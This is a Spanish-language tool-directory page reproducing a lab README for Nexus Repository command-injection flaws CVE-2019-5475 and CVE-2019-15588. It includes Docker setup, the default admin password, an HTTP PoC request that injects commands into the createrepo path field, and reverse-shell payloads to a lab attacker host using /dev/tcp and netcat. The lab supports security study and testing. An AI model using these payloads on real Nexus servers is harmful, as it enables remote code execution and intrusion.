Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2019-5475 — Laboratorio CVE-2019-5475: vulnerabilidad de inyección de comandos RCE | Kitploit
Herramientas/GitHubGitHub/exp-docs/cve-2019-5475
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónLabs y Práctica
GitHubexp-docs/cve-2019-5475

CVE-2019-5475

Laboratorio CVE-2019-5475: vulnerabilidad de inyección de comandos RCE

Ver Repositorio
53hace 3 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2019-5475

Laboratorio CVE-2019-5475 y CVE-2019-15588: vulnerabilidad de inyección de comandos RCE


0x00 Contexto

CVE-2019-5475 es una vulnerabilidad de inyección de comandos RCE en Nexus relacionada con el plugin integrado Yum Repository. Fue divulgada originalmente en hackerone, pero debido a que la primera corrección oficial fue incompleta, se derivó la vulnerabilidad CVE-2019-15588.

Ambas vulnerabilidades solo pueden explotarse tras iniciar sesión como admin, pero la contraseña de administrador predeterminada de Nexus, admin123, a menudo no se modifica, por lo que es fácil explotarlas.

0x10 Entorno del laboratorio

0x20 Estructura de directorios

root@kitploit:~
CVE-2019-5475
├── nexus-yum-core .......... [用于 debug 的 Maven 项目:模拟在 nexus GUI 输入 createrepo 或 mergerepo]
├── nexus ................... [Nexus 容器的数据挂载目录]
├── attacker ................ [攻击者机器的构建目录]
│   └── Dockerfile .......... [攻击者机器的 Docker 构建文件]
├── docker-compose.yml ...... [Docker 的构建配置]
├── imgs .................... [辅助 README 说明的图片]
└── README.md ............... [此 README 说明]

0x40 Construcción del laboratorio

  • El host debe tener docker y docker-compose preinstalados.
  • Descargue este repositorio: git clone https://github.com/lyy289065406/CVE-2019-5475
  • Abra el directorio de construcción de Nexus: cd CVE-2019-5475
  • Construya y ejecute Nexus: docker-compose up -d
  • Aproximadamente 5 minutos después, puede acceder a Nexus desde el navegador (BasicAuth es admin/admin123), donde:
NexusCVEURL
2.14.9CVE-2019-5475http://127.0.0.1:8009/nexus
2.14.14CVE-2019-15588http://127.0.0.1:8014/nexus

Este laboratorio también incluye una máquina atacante 172.168.50.2, ubicada en el mismo entorno de red que las dos máquinas objetivo, cuya función es verificar el shell inverso.

0x50 [CVE-2019-5475] Verificación del laboratorio

0x51 PoC

Inicie sesión como admin en http://127.0.0.1:8009/nexus/#capabilities; en Administration -> Capabilities -> Yum: Configuration -> Settings puede encontrar el punto de inyección RCE.

Tanto el campo Path of "createrepo" como el de Path of "mergerepo" pueden ser inyectados, y el resultado de la ejecución puede verse en Status.

Por ejemplo, al construir el PoC bash -c id || python en el punto de inyección createrepo, se puede obtener desde Status el resultado de ejecución del comando bash -c id: uid=200(nexus) gid=200(nexus) groups=200(nexus).

Con BurpSuite se puede capturar la solicitud PoC correspondiente:

root@kitploit:~
PUT /nexus/service/siesta/capabilities/RANDOM_ID HTTP/1.1
Host: 127.0.0.1:8009
accept: application/json
Content-Type: application/json
Authorization: Basic YWRtaW46YWRtaW4xMjM=
Connection: close

{"typeId":"yum","enabled":true,"properties":[{"key":"createrepoPath","value":"bash -c id || python"}],"id":"RANDOM_ID"}

0x52 EXP

Este punto de inyección puede explotarse fácilmente para construir un shell inverso:

  • Inicie sesión en la máquina atacante: docker exec -it -u root docker_attacker /bin/bash
  • Use netcat para escuchar el shell inverso: nc -lvvp 4444
  • Construya el payload en el punto de inyección createrepo mencionado anteriormente: bash -c $@|bash 0 echo bash -i >&/dev/tcp/172.168.50.2/4444 0>&1 || python

0x60 [CVE-2019-15588] Verificación del laboratorio

0x61 PoC

La ubicación de la inyección es la misma que la de CVE-2019-5475; ajuste el PoC a: /bin/bash -c id || /createrepo

0x62 EXP

Esta vulnerabilidad puede usar el mismo método para obtener un shell inverso:

  • Inicie sesión en la máquina atacante: docker exec -it -u root docker_attacker /bin/bash
  • Use netcat para escuchar el shell inverso: nc -lvvp 4444
  • En el punto de inyección createrepo, construya el payload: /bin/bash -c $@|bash 0 echo bash -i >&/dev/tcp/172.168.50.2/4444 0>&1 || /createrepo

0x70 Corrección de vulnerabilidades

  • Para CVE-2019-5475: Primer parche de corrección oficial
  • Para CVE-2019-15588: Segundo parche de corrección oficial

0x80 Acerca de nexus-yum-core

nexus-yum-core es el fragmento de código central de Nexus relacionado con esta explotación de vulnerabilidad; se utiliza principalmente para depurar y analizar directamente desde el backend el payload de entrada, sin necesidad de construir un servicio Nexus completo desde el código fuente.

0x90 Referencias

  • https://paper.seebug.org/1260/
  • https://blog.spoock.com/2018/11/25/getshell-bypass-exec/
Descargar herramienta